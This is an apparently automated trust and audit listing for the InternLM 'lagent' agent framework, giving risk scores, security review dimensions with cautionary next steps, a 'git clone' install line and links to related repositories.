Agentic Ai Engineering
Repository: agentic-ai-engineering
Author: agenticloops-ai · Source status: Clear source
Hands-on tutorials for building AI agents from scratch.
Score basis:Clear source · Low risk signals · Universal
Repository: lagent
Author: InternLM·Source status: Clear source
A lightweight framework for building LLM-based agents Topics: agent, gpt, llm, transformers.
Score basis:Clear source · Low risk signals · Universal
Trust level
72 · Review first
Usable, but inspect source, install method, and risk hints before adoption.
Risk decision
No explicit risk signals
No explicit risk signal is available.
Install readiness
script-backed · copy-only command
SkillTrust only shows install guidance and copy actions; it never executes installs.
Before you install
Review source, permissions, and execution risk first, then alternatives. Scores prioritize review; they do not replace manual judgment.
Review weakest dimensions and next actions before copying commands.
Evidence or risk signals are incomplete; compare alternatives first.
Audit grade
C · Review first
Execution risk
High
Evidence confidence
65%
SAS-v2.1 radar
SAS-v2.1
Audit grade
C · Review first
Execution risk
High
Top threats
unexpected code execution, data exfiltration
Control gaps
missing license, broad permissions
Evidence confidence
65%
Repository
InternLM/lagent
Author
InternLM
Community signal
2.2K stars · 226 forks
Last updated
2026-04-07
Primary source
InternLM/lagent
Source status
Clear source
Install method
script-backed
Command & code execution
34Focus: Whether it runs commands or scripts
Next action: Manually confirm command-running skills in an isolated directory.
High-risk action confirmation
38Focus: Whether destructive or external actions require confirmation
Next action: Avoid directly installing high-risk skills without confirmation controls.
Network & data egress
43Focus: Whether it may send data out
Next action: If unsure, restrict network access or allow only known domains.
Supported tools can change install steps; Universal entries need source review.
Explicitly supported
Candidate support (inferred)
Candidate tools are inferred signals, not official compatibility certifications.
git clone https://github.com/InternLM/lagent.gitNo explicit risk signals recorded
Review source and permissions before copying install commands.
Evidence or risk signals are incomplete; compare alternatives first.
Focus: Who published it and whether it is traceable
Next action: Review repository, author, and README first; do not install directly when source is pending.
Focus: Whether install steps can be reviewed
Next action: Prefer candidates with install docs and repository evidence.
Focus: Whether tool descriptions may hide instructions
Next action: Read README, rules, and tool descriptions before install.
Focus: What it can access
Next action: Grant only task-required permissions and prefer Ask/manual confirmation.
Focus: Whether it runs commands or scripts
Next action: Manually confirm command-running skills in an isolated directory.
Focus: Whether file reads/writes can escape scope
Next action: Check working directory and file access scope before running.
Focus: Whether it may send data out
Next action: If unsure, restrict network access or allow only known domains.
Focus: Whether it handles tokens, private keys, or agent identity
Next action: Do not provide long-lived tokens or private keys to source-pending skills.
Focus: Whether external content can steer behavior
Next action: For browser/RAG/rules skills, review permissions and confirmation controls first.
Focus: Whether memory or retrieved context can be poisoned
Next action: Try RAG/memory skills in a low-privilege environment first.
Focus: Whether external tools and MCP access are clearly bounded
Next action: Confirm which external tools it will connect to before install, and start with the smallest possible set.
Focus: Whether destructive or external actions require confirmation
Next action: Avoid directly installing high-risk skills without confirmation controls.
Focus: How far impact can spread when something goes wrong
Next action: If unsure, test in an isolated project first.
Focus: Whether actions can be traced
Next action: Prefer candidates with logs or previews.
Focus: Whether it is maintained and reusable
Next action: Check license and maintenance before organizational use.
Usable, but inspect source, install method, and risk hints before adoption.
Phase 1 only shows installation-aware, source-backed signals. SkillTrust does not execute install scripts for users.
Risk factors
No explicit risk signals.
Permission hints
repository clone, local runtime dependencies
Why related: Same task category, Keyword overlap...
Why related: Same task category, Keyword overlap, Similar install method
Repository: gram
Author: speakeasy-api · Source status: Clear source
Securely scale AI usage across your organization.
Score basis:Clear source · Low risk signals · Universal
Why related: Same task category, Keyword overlap...
Why related: Same task category, Keyword overlap, Similar install method
Repository: NVIDIA-Nemotron-3-Super
Author: cobusgreyling · Source status: Clear source
Controllable reasoning demos for NVIDIA Nemotron 3 Super (120B/12B MoE) — chat UI, CLI, API server, tool calling, budget sweep, and adaptive routing Topics: gradio, llm, mixture-of-experts, moe, nemotron, nim, nvidia, re
Score basis:Clear source · Low risk signals · Universal
Why related: Same task category, Keyword overlap...
Why related: Same task category, Keyword overlap, Similar install method
Repository: HuixiangDou
Author: InternLM · Source status: Clear source
HuixiangDou: Overcoming Group Chat Scenarios with LLM-based Technical Assistance
Score basis:Clear source · Risk needs review · Universal
Why related: Keyword overlap, Same repository ecosystem...
Why related: Keyword overlap, Same repository ecosystem, Same author
Repository: OpenAOE
Author: InternLM · Source status: Clear source
LLM Group Chat Framework: chat with multiple LLMs at the same time.
Score basis:Clear source · Risk needs review · Universal
Why related: Keyword overlap, Same repository ecosystem...
Why related: Keyword overlap, Same repository ecosystem, Same author
Repository: posthog
Author: PostHog · Source status: Clear source
🦔 PostHog is an all-in-one developer platform for building successful products.
Score basis:Clear source · High risk signals · Universal
Why related: Same task category, Keyword overlap...
Why related: Same task category, Keyword overlap, Similar install method
Repository: lmdeploy
Author: InternLM · Source status: Clear source
LMDeploy is a toolkit for compressing, deploying, and serving LLMs.
Score basis:Clear source · Risk needs review · Universal
Repository: HuixiangDou
Author: InternLM · Source status: Clear source
HuixiangDou: Overcoming Group Chat Scenarios with LLM-based Technical Assistance
Score basis:Clear source · Risk needs review · Universal